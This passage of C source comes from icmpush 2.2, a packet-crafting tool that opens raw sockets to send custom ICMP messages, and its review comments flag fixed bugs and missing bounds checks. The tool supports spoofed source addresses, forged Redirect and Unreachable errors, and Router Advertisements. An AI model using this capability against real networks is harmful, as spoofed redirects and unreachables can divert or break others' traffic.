           packet->orig = packet->destino.sin_addr.s_addr;
        break;
     case ICMP_DEST_UNREACH:
        if( (packet->cod_icmp = existe_codigo(code_icmp, array_aux,
                                              max_cod)) == -1 )
           salir(7);
        break;
     case ICMP_TIME_EXCEEDED:
        if( (packet->cod_icmp = existe_codigo(code_icmp, array_aux,
                                              max_cod)) == -1 )
           salir(7);
        break;
     case ICMP_ROUTER_ADVERT:
        packet->timeout = 0;
        /* no break: continues into default, so a numeric -c is applied */
     default:
        /* Without -c the code is 0, otherwise atoi() of the argument. */
        packet->cod_icmp = (strcmp(code_icmp,"NOTHING")?atoi(code_icmp):0);
        break;
  }

  if ( packet->orig == 1 )
     packet->orig = packet->ip_spoof;
}

/******************************/
/* Add a router to the linked */
/* list of Advertisements     */
/* entries.
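:) */
/******************************/
/* Append one entry (address + preference) to the list that hangs off    */
/* init->router and count it in init->num_routers.                        */
/*                                                                        */
/*   init        - packet description that owns the list.                 */
/*   router_addr - router address to store.                               */
/*   preference  - preference level to store.                             */
/*                                                                        */
/* The first entry is always accepted. A later entry is refused, with a   */
/* message in verbose mode, once num_routers equals MAX_ROUTERS - 1.      */
/* If memory cannot be obtained for the first entry the program exits     */
/* with a failure status (the status used to be 0); for a later entry     */
/* the function reports the error and returns without adding anything.    */
/* The allocation check now tests the pointer returned by malloc();       */
/* it used to test the list cursor, which is never NULL at that point,    */
/* so a failed allocation was dereferenced.                               */
void add_router(struct my_pack *init, u_long router_addr, u_long preference)
{
  struct router *node;
  struct router *tail = init->router;
  int is_first = ( tail == NULL );

  if ( !is_first )
  {
     /* Walk to the last entry of the list. */
     while ( tail->next != NULL )
        tail = tail->next;

     if ( init->num_routers == (MAX_ROUTERS - 1) )
     {
        /* MAX_ROUTERS has the type of a sizeof expression; convert */
        /* it so that the argument matches the %d conversion.       */
        if ( verbose )
           fprintf(stdout, "Sorry, no more than %d routers allowed.\n",
                   (int)(MAX_ROUTERS - 1));
        return;
     }
  }

  node = malloc(sizeof *node);
  if ( node == NULL )
  {
     fprintf(stderr, "Malloc error -> %s\n", sys_errlist[errno]);
     if ( is_first )
        exit(1);
     return;
  }

  node->address = router_addr;
  node->pref = preference;
  node->next = NULL;

  if ( is_first )
     init->router = node;
  else
     tail->next = node;
  init->num_routers++;
}

/**********************/
/* For debug only ... */
/**********************/
/* Print every entry of the router list of init to stdout, one per line. */
/* NOTE(review): %ld assumes that the pref member is a long - confirm    */
/* against struct router in packet.h.                                    */
void recorre_lista(struct my_pack *init )
{
  struct router *cursor = init->router;
  struct in_addr direc;

  while(cursor)
  {
     direc.s_addr = cursor->address;
     fprintf(stdout, " -> Router = %s - Pref = %ld\n", inet_ntoa(direc),
             cursor->pref);
     cursor = cursor->next;
  }
}

/************************************/
/* Look for the code of the ICMP    */
/* type within the array_cod.       */
/* Only the first max_cod entries   */
/* are compared.                    */
/* Return -1 on error, also when    */
/* cod or array_cod is NULL.        */
/* Return the code value on success */
/************************************/
int existe_codigo( char *cod, char **array_cod, int max_cod )
{
  int idx;

  /* A type without a code table leaves the table pointer NULL. */
  if ( cod == NULL || array_cod == NULL )
     return -1;

  for ( idx = 0; idx < max_cod; idx++ )
     if ( !strcmp( cod, array_cod[idx] ) )
        return idx;

  return -1;
}

/********************************************/
/* If nom_host == NULL then we want to know */
/* if the IP (in binary format) is ok.      */
/* If nom_host != NULL then we put the      */
/* IP of nom_host into bin_host.            */
/* Return 1 on error, 0 on success.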
*/ /********************************************/ /* We allow the 255.255.255.255 address !! */ /********************************************/ int existe_host( char *nom_host, u_long *bin_host ) { struct hostent *hinfo; struct sockaddr_in host_tmp; struct in_addr host_binario; iniciamem( (char *)&host_tmp, sizeof(host_tmp) ); iniciamem( (char *)&host_binario, sizeof(host_binario) ); host_tmp.sin_family = AF_INET; if ( nom_host == NULL ) /* We wanna know if the binary IP is OK. */ { if ( (hinfo = gethostbyaddr( (char *)bin_host, 4, AF_INET )) ) return 0; else return 1; } if ( inet_aton( nom_host, &host_binario) ) { copymem( (char *)&host_binario, (char *)bin_host, sizeof(host_binario)); return 0; } if ( (hinfo = gethostbyname( nom_host )) ) /* Put nom_host into bin_host */ { copymem(hinfo->h_addr, (char *)&host_tmp.sin_addr, hinfo->h_length); copymem( (char *) &host_tmp.sin_addr.s_addr, (char *)bin_host, sizeof( host_tmp.sin_addr.s_addr)); return 0; } return 1; } icmpush-2.2.orig/BUGS0100644000175000017500000000012306657376617012613 0ustar domdomYes! There are many bugs! :D Plz, send your bugs to: tcpbgp@softhome.net tnx.icmpush-2.2.orig/icmpush.c0100644000175000017500000010266006662505305013735 0ustar domdom/***************************************************************************/ /* I C M P U S H . C v2.2 */ /***************************************************************************/ /* - Program that allow to send the following ICMP packets fully */ /* customized: */ /* a) ICMP errors: */ /* - Redirect. */ /* - Source Quench. */ /* - Time Exceeded. */ /* - Destination Unreach. */ /* - Parameter Problem. */ /* b) ICMP information: */ /* - Address Mask Request. */ /* - Timestamp. */ /* - Information Request. */ /* - Echo Request. */ /* - Router Solicitation (Router Discovery). */ /* - Router Advertisement (Router Discovery). 
*/ /***************************************************************************/ /* Copyright (C) 1999 Slayer (tcpbgp@softhome.net) */ /* This program is free software; you can redistribute it and/or modify */ /* it under the terms of the GNU General Public License as published by */ /* the Free Software Foundation; either version 2 of the License, or */ /* (at your option) any later version. */ /* This program is distributed in the hope that it will be useful, */ /* but WITHOUT ANY WARRANTY; without even the implied warranty of */ /* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the */ /* GNU General Public License for more details. */ /* You should have received a copy of the GNU General Public License */ /* along with this program; if not, write to the Free Software */ /* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. */ /***************************************************************************/ /* echo "Ideas & comments" | /bin/mail tcpbgp@softhome.net */ /* echo "Destructive opinions & flames" >> /dev/null */ /* sorry for the bad english. :) */ /***************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "compat.h" #include "misc.h" #include "packet.h" #include "err_msg.h" #ifdef SPANISH #define LNG 0 #else #define LNG 1 #endif /************************/ /* Global variables ... */ /************************/ extern char *version; extern char max_gbg; char *prog; u_short verbose = 0; u_short more_verbose = 0; u_short is_pattern = 0; u_short resolve = 1; /****************************/ /* ... end global variables */ /****************************/ #ifdef SOLARIS extern char *sys_errlist[]; #endif #define LINE fprintf(stdout, \ "-----------------------------------------------------\n") /***************************/ /* Functions prototypes... 
*/ /***************************/ void adjust_sock( int ); int envia_icmp_err( char *, struct my_pack * ); int envia_icmp_info( char *, struct my_pack *, u_short, u_short ); int add_garbage( char *, u_long, int ); void fill_garbage( char *, u_long ); void put_routers( struct my_pack *, struct id_rdiscovery * ); void envia_ip( int, u_long, struct sockaddr_in *, int, int, int, int, u_char *); void send2sock( int, char *, int, struct sockaddr * ); void dont_print( struct in_addr, struct icmp2 * ); void print_info_reply( struct in_addr, struct icmp2 * ); void print_timestamp_reply( struct in_addr, struct icmp2 * ); void print_address_reply( struct in_addr, struct icmp2 * ); void print_router_reply( struct in_addr, struct icmp2 * ); void print_echo_reply( struct in_addr, struct icmp2 * ); void proto_tcp64( union data_hdr *, u_short, u_short ); void proto_udp64( union data_hdr *, u_short, u_short ); void proto_icmp64( union data_hdr *, u_short, u_short ); void read_icmp( int, char *, int ); void print_pack( char *, int, u_char, u_char, u_short, u_short ); void print_err_pack ( struct icmp2 * ); int in_cksum( u_short *, int ); char *pasa( struct sockaddr_in * ); u_long day2milisecs( void ); void salir( int ); void salir_con_error( int ); void help( void ); void timeout_func( int ); void init_packet_struct( struct my_pack * ); extern void parsea_args( char **, struct my_pack * ); #ifdef SOLARIS extern long random(); extern int srandom( unsigned); #else extern int get_mtu( struct sockaddr_in * ); #endif /*******************************/ /* ...end functions prototypes */ /*******************************/ /*************************/ /* ICMP types handler... 
*/ /*************************/ struct icmp_class { char *name; int class; int reply; void (*print_packet)( struct in_addr, struct icmp2 *); } icmp_info_or_err[]= { { "Echo Reply", ICMP_INFO, NO_REPLY, print_echo_reply }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Destination Unreach", ICMP_ERROR, NO_REPLY, dont_print }, { "Source Quench", ICMP_ERROR, NO_REPLY, dont_print }, { "Redirect", ICMP_ERROR, NO_REPLY, dont_print }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Not implemented", 0, NO_REPLY, dont_print }, { "Echo Request", ICMP_INFO, ICMP_ECHO_REPLY, dont_print }, { "Router Advertisement", ICMP_INFO, NO_REPLY, print_router_reply }, { "Router Solicitation", ICMP_INFO, ICMP_ROUTER_ADVERT, dont_print }, { "Time Exceeded", ICMP_ERROR, NO_REPLY, dont_print }, { "Parameter Problem", ICMP_ERROR, NO_REPLY, dont_print }, { "Timestamp Request", ICMP_INFO, ICMP_TIMESTAMP_REPLY, dont_print }, { "Timestamp Reply", ICMP_INFO, NO_REPLY, print_timestamp_reply }, { "Info Request", ICMP_INFO, ICMP_INFO_REPLY, dont_print }, { "Info Reply", ICMP_INFO, NO_REPLY, print_info_reply }, { "Address Mask Request", ICMP_INFO, ICMP_ADDRESS_REPLY, dont_print }, { "Address Mask Reply", ICMP_INFO, NO_REPLY, print_address_reply } }; /***********************************/ /* Access to 64 bits protocol data */ /* to build an ICMP error packet. */ /***********************************/ struct protocols { int proto; void (*func_proto)( union data_hdr *, u_short, u_short ); } data_protocols[] = { { IPPROTO_TCP, proto_tcp64 }, { IPPROTO_UDP, proto_udp64 }, { IPPROTO_ICMP, proto_icmp64 } }; /*******************************/ /* Initial function. 
*/
/* Make the socket and buffers */
/*******************************/
/*
 * main: parse the command line into a struct my_pack, open a raw ICMP
 * socket, build the requested ICMP message in 'buf', hand it to
 * envia_ip() and, for information messages with a non-zero timeout, wait
 * for replies in read_icmp().
 *
 * With no arguments it prints the program name/version plus a hint and
 * exits with status 0.  Every failure leaves through salir() or
 * salir_con_error(), which exit with the code they are given.
 */
int main(int argc, char **argv)
{
    char buf[SIZE_BIG];
    struct my_pack packet;
    struct protoent *proto;
    u_short proc_id;
    int sock;
    int tam_icmp;

    iniciamem(buf, sizeof(buf));
    prog = argv[0];
    proc_id = getpid();     /* truncated to 16 bits; passed on as the ICMP id */

    if (argc == 1) {
        fprintf(stdout,"%s %s\n", prog, version);
#ifdef SPANISH
        fprintf(stdout,"Ejecuta '%s -h' para ver la ayuda.\n",prog);
#else
        fprintf(stdout,"Try '%s -h' to display the help.\n",prog);
#endif
        exit(0);
    }

    init_packet_struct(&packet);
    parsea_args(argv, &packet);

    proto = getprotobyname("icmp");
    if (proto == NULL)
        salir(2);

    /* Raw socket for the ICMP protocol. */
    sock = socket(AF_INET, SOCK_RAW, proto->p_proto);
    if (sock < 0)
        salir_con_error(3);

    /*
     * The author left a privilege drop at this point, commented out and
     * marked "This is *NOT* a good idea / Use it at your own risk!":
     *
     *     if ( !geteuid() ) setuid( getuid() );
     *
     * NOTE(review): as the code stands, the process keeps whatever
     * privileges it had when it opened the raw socket for the rest of the
     * run, including while read_icmp() handles packets received from the
     * network.
     */

    adjust_sock(sock);

    if (icmp_info_or_err[packet.tipo_icmp].class) {
        /* Non-zero class: ICMP error message. */
        tam_icmp = envia_icmp_err(buf, &packet);
    } else {
        /* ICMP information message; the sequence number is random. */
        srandom(time(0));
        tam_icmp = envia_icmp_info(buf, &packet, proc_id, random()%0xFFFF);
    }

    if (more_verbose) {
#ifdef SPANISH
        fprintf(stdout," -> Total tamaño ICMP = %d bytes\n", tam_icmp);
#else
        fprintf(stdout," -> ICMP total size = %d bytes\n", tam_icmp);
#endif
    }

    envia_ip(sock, packet.ip_spoof, (struct sockaddr_in *)&packet.destino,
             TTL_DFL, ICMP_ERR_DFL_TOS, IPPROTO_ICMP, tam_icmp, buf);

    if (verbose) {
#ifdef SPANISH
        fprintf(stdout,"ICMP %s enviado a %s (%s)\n",
                icmp_info_or_err[packet.tipo_icmp].name, argv[argc-1],
                inet_ntoa( packet.destino.sin_addr) );
#else
        fprintf(stdout,"ICMP %s packet sent to %s (%s)\n",
                icmp_info_or_err[packet.tipo_icmp].name, argv[argc-1],
                inet_ntoa( packet.destino.sin_addr) );
#endif
    }

    /* Replies are only read for information messages with a timeout set. */
    if (!icmp_info_or_err[packet.tipo_icmp].class && packet.timeout) {
        if (verbose) {
#ifdef SPANISH
            fprintf(stdout, "\nRecibiendo respuestas ICMP ...\n");
#else
            fprintf(stdout, "\nReceiving ICMP replies ...\n");
#endif
        }
        read_icmp(sock, buf, packet.timeout);
    }

    salir(0);
    exit(0); // Never reached but avoid a warning :)
}

/********************************/
/* Adjust the raw socket values */
/* Send and receive buffers,    */
/* broadcasting ...
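*/
/********************************/
/*
 * adjust_sock: set the options this program needs on the raw socket.
 * IP_HDRINCL is mandatory (failure exits through salir_con_error(25));
 * SO_BROADCAST, SO_RCVBUF and SO_SNDBUF are best effort and a failure is
 * only reported when more_verbose is set.
 */
void adjust_sock( int sock )
{
    int on = 1, tam_sock_buf = SIZE_BIG;

    if ( setsockopt( sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on) ) == -1 )
        salir_con_error(25);

    if ( setsockopt( sock, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on) ) == -1
         && more_verbose )
        fprintf(stderr,"%s: SO_BROADCAST -> %s\n", prog, sys_errlist[errno] );

    if ( setsockopt( sock, SOL_SOCKET, SO_RCVBUF, (char *)&tam_sock_buf,
                     sizeof(tam_sock_buf) ) == -1 && more_verbose )
        fprintf(stderr,"%s: SO_RCVBUF -> %s\n", prog, sys_errlist[errno] );

    if ( setsockopt( sock, SOL_SOCKET, SO_SNDBUF, (char *)&tam_sock_buf,
                     sizeof(tam_sock_buf) ) == -1 && more_verbose )
        fprintf(stderr,"%s: SO_SNDBUF -> %s\n", prog, sys_errlist[errno] );
}

/****************************************/
/* Build an ICMP information packet and */
/* put it into the address 'buffer'.    */
/* Return the packet length in bytes.   */
/****************************************/
/*
 *   buffer - destination for the ICMP message (main() passes a SIZE_BIG
 *            byte array).
 *   packet - parsed command-line settings.
 *   id     - value stored in the ICMP id field.
 *   seqnum - value stored in the ICMP sequence field.
 *
 * The type-specific part is filled in first, then add_garbage() may extend
 * the message, and finally the checksum is computed over the whole length.
 */
int envia_icmp_info( char *buffer, struct my_pack *packet, u_short id,
                     u_short seqnum )
{
    int tam = TCAB_ICMP_MSG;
    u_long actual_time;
    struct icmp2 *icp = (struct icmp2 *) buffer;

    icp->icmp_type = packet->tipo_icmp;
    icp->icmp_code = packet->cod_icmp;
    icp->icmp_cksum = 0;        /* must be zero while the checksum is computed */
    icp->icmp_id = id;
    icp->icmp_seq = seqnum;

    switch ( packet->tipo_icmp ) {
    case ICMP_TIMESTAMP:
        icp->icmp_otime = htonl( day2milisecs() );
        icp->icmp_rtime = 0;
        icp->icmp_ttime = 0;
        tam += TDATA_TIMESTAMP;
        break;

    case ICMP_INFO_REQUEST:
        break;

    case ICMP_ADDRESS:
        icp->icmp_mask = htonl(packet->maskaddr);
        tam += TDATA_ADDRESS;
        break;

    case ICMP_ROUTER_SOLICIT:
        icp->icmp_reserved = 0;
        break;

    case ICMP_ROUTER_ADVERT:
        icp->icmp_num_addr = packet->num_routers;
        icp->icmp_addr_entry_size = 2;
        icp->icmp_lifetime = htons(packet->lifetime);
        put_routers( packet, (struct id_rdiscovery *)
                     (buffer + sizeof(struct icmp_hdr) + TCAB_RDISC) );
        /* The length is recomputed here rather than added to TCAB_ICMP_MSG. */
        tam = sizeof(struct icmp_hdr) + TCAB_RDISC
              + (TDATA_RDISC * packet->num_routers);
        break;

    case ICMP_ECHO_REQUEST:
        if ( packet->size_pattern ) {
            /*
             * NOTE(review): nothing in this function bounds size_pattern
             * against the space left in 'buffer'; confirm that the
             * argument parser enforces a limit.
             */
            copymem( packet->pattern, icp->icmp_data, packet->size_pattern );
            tam += packet->size_pattern;
        } else {
            /* No pattern: the payload is the send time, read back by
               print_echo_reply() to show the round-trip time. */
            actual_time = htonl( day2milisecs() );
            copymem( (char *)&actual_time, icp->icmp_data, sizeof(actual_time) );
            tam += sizeof(actual_time);
        }
        break;
    }

    tam = add_garbage( buffer, packet->garbage, tam);
    icp->icmp_cksum = in_cksum( (u_short *)icp, tam );
    return( tam );
}

/**************************/
/* Control the garbage.   */
/* Return the size of the */
/* garbage added to the   */
/* packet + the ICMP hdr. */
/**************************/
/*
 *   buffer  - start of the ICMP message being built.
 *   garbage - number of filler bytes requested (0 = none).
 *   tam     - bytes of 'buffer' already used.
 *
 * Filler is appended at buffer + tam.  The total never exceeds
 * SIZE_BIG - TCAB_IP: a larger request is cut down to what fits.  When
 * 'tam' already reaches that limit nothing is written and 'tam' is
 * returned unchanged; the previous test (tam < SIZE_BIG) let such a call
 * through with a negative remaining size, which compared as a huge
 * unsigned value and could send the full request to fill_garbage().
 */
int add_garbage( char *buffer, u_long garbage, int tam )
{
    int room = (int)(SIZE_BIG - TCAB_IP) - tam;

    if ( !garbage || room <= 0 )
        return tam;

    if ( garbage > (u_long)room ) {
        /* No message when the request equals SIZE_BIG. */
        if ( verbose && garbage != SIZE_BIG )
#ifdef SPANISH
            fprintf(stdout," -> Tamaño datos basura demasiado grande, usando m\141ximo (%d bytes)\n", room);
#else
            fprintf(stdout," -> Size of data garbage too big, using maximum (%d bytes)\n", room);
#endif
        fill_garbage( buffer + tam, room );
        tam += room;
    } else {
        fill_garbage( buffer + tam, garbage );
        tam += garbage;
    }
    return tam;
}

/***************************/
/* Fill the buffer with    */
/* "data" size of garbage. */
/***************************/
/*
 * Writes 'data' bytes at 'buf', alternating the values 33 and 72 and
 * starting with 33.  The caller must guarantee the space.
 */
void fill_garbage( char *buf, u_long data )
{
    u_long i;

    if ( more_verbose )
#ifdef SPANISH
        fprintf(stdout," -> Tama\161o datos basura = %ld bytes\n", data );
#else
        fprintf(stdout," -> Data garbage size = %ld bytes\n", data );
#endif

    for ( i = 0; i < data; i++ )
        buf[i] = (i % 2 == 0) ? 33 : 72;
}

/***************************/
/* Fetch the routers from  */
/* the linked list and put */
/* them into the buffer.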
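*/
/***************************/
/*
 * put_routers: copy each entry of packet->router into consecutive
 * struct id_rdiscovery slots starting at 'data'.  The address is stored as
 * found in the list; the preference is converted with htonl().  The caller
 * must provide one slot per list entry.
 */
void put_routers( struct my_pack *packet, struct id_rdiscovery *data)
{
    struct router *entry;

    for ( entry = packet->router; entry != NULL; entry = entry->next, ++data ) {
        data->router_addr.s_addr = entry->address;
        data->pref_level.s_addr = htonl(entry->pref);
    }
}

/*
 * day2milisecs: milliseconds elapsed since the last multiple of 86400
 * seconds of the gettimeofday() clock.
 */
u_long day2milisecs( void )
{
    struct timeval tiempo;

    gettimeofday( &tiempo, NULL);
    return ( (tiempo.tv_sec%86400) * 1000   /* seconds within the day -> milliseconds */
             + tiempo.tv_usec / 1000        /* microseconds -> milliseconds */
           );                               /* milliseconds within the current second */
}

/**************************************************/
/* Build an ICMP error packet and put it into the */
/* address 'buffer'.                              */
/* Also build the IP header and the 64 data bits  */
/* of the original datagram.                      */
/* Return the packet length in bytes.             */
/**************************************************/
/*
 *   buffer - destination for the ICMP message.
 *   packet - parsed command-line settings.
 *
 * Exits through salir(12) when the scratch allocation fails and through
 * salir(10) when packet->protocol is not listed in data_protocols[].
 * The scratch block is released once its contents have been copied into
 * 'buffer'; the previous code never freed it.
 */
int envia_icmp_err ( char *buffer, struct my_pack *packet )
{
    struct icmp2 *icp = (struct icmp2 *) buffer;
    union data_hdr *mix = malloc(TCAB_64DATA);
    int elemento, tam;
    int found = 0;

    if ( !mix )
        salir(12);
    iniciamem( mix, TCAB_64DATA);

    icp->icmp_type = packet->tipo_icmp;
    icp->icmp_code = packet->cod_icmp;
    icp->icmp_cksum = 0;
    icp->icmp_gwaddr.s_addr = 0;

    /* IP header embedded in the ICMP error. */
    icp->icmp_ip.ip_hl = TCAB_IP >> 2;
    icp->icmp_ip.ip_v = 4;
    icp->icmp_ip.ip_tos = 0x0000;
    icp->icmp_ip.ip_len = htons( TCAB_IP + TCAB_ICMP + TCAB_64DATA);
    icp->icmp_ip.ip_id = htons(0x4A2F);
    icp->icmp_ip.ip_off = 0x0000;
    icp->icmp_ip.ip_ttl = TTL_DFL;
    icp->icmp_ip.ip_p = packet->protocol;
    icp->icmp_ip.ip_sum = 0x0000;

    switch( packet->tipo_icmp ) {
    case ICMP_REDIRECT:
        icp->icmp_ip.ip_src.s_addr = packet->orig;
        icp->icmp_ip.ip_dst.s_addr = packet->dest_red;
        icp->icmp_gwaddr.s_addr = packet->gway;
        break;

    case ICMP_PARAM_PROB:
        icp->icmp_pptr = packet->pointer;
        /* fallthrough: the addresses are set as for every other type */
    default:
        icp->icmp_ip.ip_src.s_addr = packet->destino.sin_addr.s_addr;
        icp->icmp_ip.ip_dst.s_addr = packet->orig;
    }

    icp->icmp_ip.ip_sum = in_cksum( (u_short *)(&(icp->icmp_ip)), TCAB_IP );

    /* Let the handler for the embedded protocol fill in the data bytes. */
    for ( elemento=0; elemento < MAX(data_protocols); elemento++ ) {
        if ( packet->protocol == data_protocols[elemento].proto ) {
            (*data_protocols[elemento].func_proto)( mix, packet->p_origen,
                                                    packet->p_destino);
            found = 1;
            break;
        }
    }
    if ( !found )
        salir(10);

    copymem( mix, icp + 1, TCAB_64DATA );
    free( mix );

    tam = add_garbage( buffer, packet->garbage, (TCAB_ICMP + TCAB_64DATA) );
    icp->icmp_cksum = in_cksum( (u_short *)icp, tam );
    return( tam );
}

/* Fill 'mix' as the start of a TCP header: ports plus a fixed sequence number. */
void proto_tcp64( union data_hdr *mix, u_short porto, u_short portd)
{
    mix->cab_tcp.source = htons(porto);      /* Source port */
    mix->cab_tcp.dest = htons(portd);        /* Destination port */
    mix->cab_tcp.seq = htonl(0xC010C005);    /* TCP sequence number */
}

/* Fill 'mix' as a UDP header: ports plus fixed length and checksum values. */
void proto_udp64( union data_hdr *mix, u_short porto, u_short portd )
{
    mix->cab_udp.source = htons(porto);      /* Source port */
    mix->cab_udp.dest = htons(portd);        /* Destination port */
    mix->cab_udp.uh_ulen = htons(12);        /* Length */
    mix->cab_udp.uh_sum = htons(0xFA13);     /* Checksum */
}

/*
 * Fill 'mix' as an ICMP Echo Request header.  The id and sequence number
 * are stored as passed in, and the checksum is computed over TCAB_64DATA
 * bytes.
 */
void proto_icmp64( union data_hdr *mix, u_short identif, u_short num_seq )
{
    mix->cab_echo.type = ICMP_ECHO_REQUEST;
    mix->cab_echo.code = 0x0;                /* Echo Request */
    mix->cab_echo.cksum = 0x0000;            /* Checksum, zero while computing */
    mix->cab_echo.id = identif;              /* Echo Request ID */
    mix->cab_echo.seq = num_seq;             /* Echo Request sequence number */
    mix->cab_echo.cksum = in_cksum( (u_short *)mix, TCAB_64DATA );
}

/******************************************/
/* Build an IP datagram adding the data   */
/* 'paquete' and sending it to the socket */
/* 's'.                                   */
/* Make the fragmentation if necessary,   */
/* getting the MTU value of the outgoing  */
/* interface (linuz only).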
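*/
/******************************************/
/*
 *   s        - raw socket to send on.
 *   orig     - value stored in the IP source address field.
 *   vict     - destination address (header field and sendto() target).
 *   ttl, tos, prot - stored in the matching IP header fields.
 *   lenpack  - number of payload bytes at 'paquete'.
 *   paquete  - payload (the ICMP message).
 *
 * The payload is sent in pieces of at most 'mtu' bytes, each behind a copy
 * of the same IP header built in the local buffer buf_ip.
 */
void envia_ip( int s, u_long orig, struct sockaddr_in *vict, int ttl, int tos,
               int prot, int lenpack, u_char *paquete )
{
    int mtu = SIZE_BIG-TCAB_IP, len, len_pack = lenpack, offset_pack = 0;
    char buf_ip[SIZE_BIG];
    struct ip2 *ip_p = (struct ip2 *) buf_ip;

    iniciamem( buf_ip, SIZE_BIG );

    ip_p->ip_hl = TCAB_IP >> 2;
    ip_p->ip_v = 4;
    ip_p->ip_tos = tos;
    ip_p->ip_ttl = ttl;
    ip_p->ip_id = htons(0x3372);
    ip_p->ip_p = prot;

    /* If you want to calculate the IP header checksum
     * you must delete the comments of the next line
     * because the Linux kernel fill in automatically:
     *
     * ip_p->ip_sum = in_cksum( (u_short *)ip_p, TCAB_IP );
     */
    ip_p->ip_sum = 0x0000;
    ip_p->ip_src.s_addr = orig;
    ip_p->ip_dst.s_addr = vict->sin_addr.s_addr;

#ifdef LINUX
    mtu = get_mtu( vict ) - TCAB_IP;
    /*
     * get_mtu() is defined elsewhere.  A result that leaves no payload
     * room would make 'len' zero or negative below (the loop would never
     * finish), and one larger than buf_ip would let copymem() write past
     * it, so fall back to the built-in default in both cases.
     */
    if ( mtu <= 0 || mtu > (int)(SIZE_BIG - TCAB_IP) )
        mtu = SIZE_BIG - TCAB_IP;
#endif

    if ( more_verbose ) {
        fprintf(stdout, " -> MTU = %d bytes\n", mtu + TCAB_IP);
#ifdef SPANISH
        fprintf(stdout," -> Longitud total (ICMP + IP) = %d bytes\n", len_pack + TCAB_IP);
#else
        fprintf(stdout," -> Total packet size (ICMP + IP) = %d bytes\n", len_pack + TCAB_IP);
#endif
    }

    while ( len_pack > 0 ) {
        len = len_pack;
        if ( len > mtu )
            len = mtu;

        copymem( paquete, ip_p + 1, len );      /* payload right after the header */
        ip_p->ip_len = htons(TCAB_IP + len);
        ip_p->ip_off = htons(offset_pack >> 3);
        len_pack-=len;

#ifdef LINUX
        if ( (offset_pack + mtu) <= 65515 )     /* 65535 - 20 minimum IP header */
        {
#endif
            if ( len_pack > 0 )                 /* more pieces follow */
                ip_p->ip_off |= htons(IP_MF);
            send2sock( s, buf_ip, ntohs(ip_p->ip_len), (struct sockaddr *)vict );
#ifdef LINUX
        }
        else
        {
            /* Last packet must *NOT* have the IP_MF */
            if ( verbose && !max_gbg && ( lenpack > (offset_pack + mtu) ) )
#ifdef SPANISH
                fprintf(stderr," -> ¡Lo siento! No puedo enviar más de %d bytes en total\n", offset_pack + mtu + TCAB_IP);
#else
                fprintf(stderr," -> Sorry! Cannot send more than %d total bytes\n", offset_pack + mtu + TCAB_IP);
#endif
            send2sock( s, buf_ip, ntohs(ip_p->ip_len), (struct sockaddr *)vict );
            break;
        }
#endif
        paquete+=len;
        offset_pack+=len;
    }
}

/***************************/
/* Send datalen 'len' from */
/* 'buf_ip' to socket 's'. */
/***************************/
/*
 * A sendto() failure exits through salir_con_error(9); a short send is
 * only reported, and only when verbose is set.
 */
void send2sock( int s, char *buf_ip, int len, struct sockaddr *host )
{
    int sent = sendto( s, buf_ip, len, 0, host, sizeof(struct sockaddr_in) );

    if ( sent < 0 )
        salir_con_error(9);

    if ( verbose && sent != len )
#ifdef SPANISH
        fprintf(stderr,"!!Cuidado!! --> Bytes enviados = %d\n",sent);
#else
        fprintf(stderr,"Warning!! --> Bytes sent = %d\n",sent);
#endif
}

/*************************/
/* Read ICMP packets ... */
/*************************/
sigjmp_buf myjmp;   /* jump target used by timeout_func() to end read_icmp() */

/*
 *   sock_lec - raw socket to read from.
 *   buf_snd  - the ICMP message that was sent; its type, code, id and
 *              sequence number are passed to print_pack() for matching.
 *   timeout  - seconds until SIGALRM ends the loop.
 *
 * SIGALRM is unblocked only around recvfrom(), so the handler cannot
 * interrupt print_pack().  Exits through salir(17) if the handler cannot
 * be installed and through salir(16) on a recvfrom() error.
 */
void read_icmp( int sock_lec, char *buf_snd, int timeout )
{
    char buf_rcv[SIZE_BIG];
    sigset_t mysignal_set;
    struct sockaddr origen;
    struct icmp2 *icp = (struct icmp2 *) buf_snd;
    int n, tam = sizeof(struct sockaddr);

    sigemptyset( &mysignal_set );
    sigaddset( &mysignal_set, SIGALRM );

    if ( signal( SIGALRM, timeout_func ) == SIG_ERR )
        salir(17);

    alarm( timeout );

    for ( ; ; ) {
        /* timeout_func() jumps back here with a non-zero value. */
        if ( sigsetjmp(myjmp, 1) != 0 )
            break;

        iniciamem( buf_rcv, SIZE_BIG );

        sigprocmask(SIG_UNBLOCK, &mysignal_set, NULL);  /* Unblock ... */
        n = recvfrom( sock_lec, buf_rcv, sizeof(buf_rcv), 0, &origen, &tam);
        sigprocmask(SIG_BLOCK, &mysignal_set, NULL);    /* ... Block */

        if ( n < 0 )
            salir(16);  /* recvfrom error */

        print_pack( buf_rcv, n, icp->icmp_type, icp->icmp_code,
                    icp->icmp_id, icp->icmp_seq );
    }
}

/********************************/
/* Print a received ICMP packet */
/********************************/
/*
 *   buf_rcv - received datagram, starting at its IP header.
 *   n       - number of bytes received.
 *   type    - ICMP type of the request that was sent; selects the expected
 *             reply type through icmp_info_or_err[type].reply.
 *   code    - ICMP code of the request (not used here).
 *   id, seqnum - id and sequence number of the request, compared with the
 *             reply except for Router Advertisements.
 *
 * Everything in buf_rcv comes from the network, so the lengths and the
 * ICMP type are checked before they are used:
 *   - a datagram too short for its own IP header plus TCAB_ICMP_MSG bytes
 *     (the size envia_icmp_info() uses for a message holding only type,
 *     code, checksum, id and sequence) is ignored;
 *   - the type must be a valid index of icmp_info_or_err[].  MAX() is
 *     defined outside this part of the file; envia_icmp_err() uses it as an
 *     element count, which would make the previous "> MAX(...)" test accept
 *     an index one past the table, so the count is computed locally.
 */
void print_pack( char *buf_rcv, int n, u_char type, u_char code, u_short id,
                 u_short seqnum )
{
    const int num_types = (int)(sizeof(icmp_info_or_err) / sizeof(icmp_info_or_err[0]));
    struct ip2 *ip = (struct ip2 *) buf_rcv;
    struct icmp2 *icmp_rcv;
    struct hostent *thishost;
    int ip_hdr_len;

    if ( n < (int)TCAB_IP )
        return;
    ip_hdr_len = ip->ip_hl << 2;
    if ( ip_hdr_len < (int)TCAB_IP || n < ip_hdr_len + (int)TCAB_ICMP_MSG )
        return;

    icmp_rcv = (struct icmp2 *)((char *)ip + ip_hdr_len);

    if ( (icmp_rcv->icmp_type >= num_types) ||
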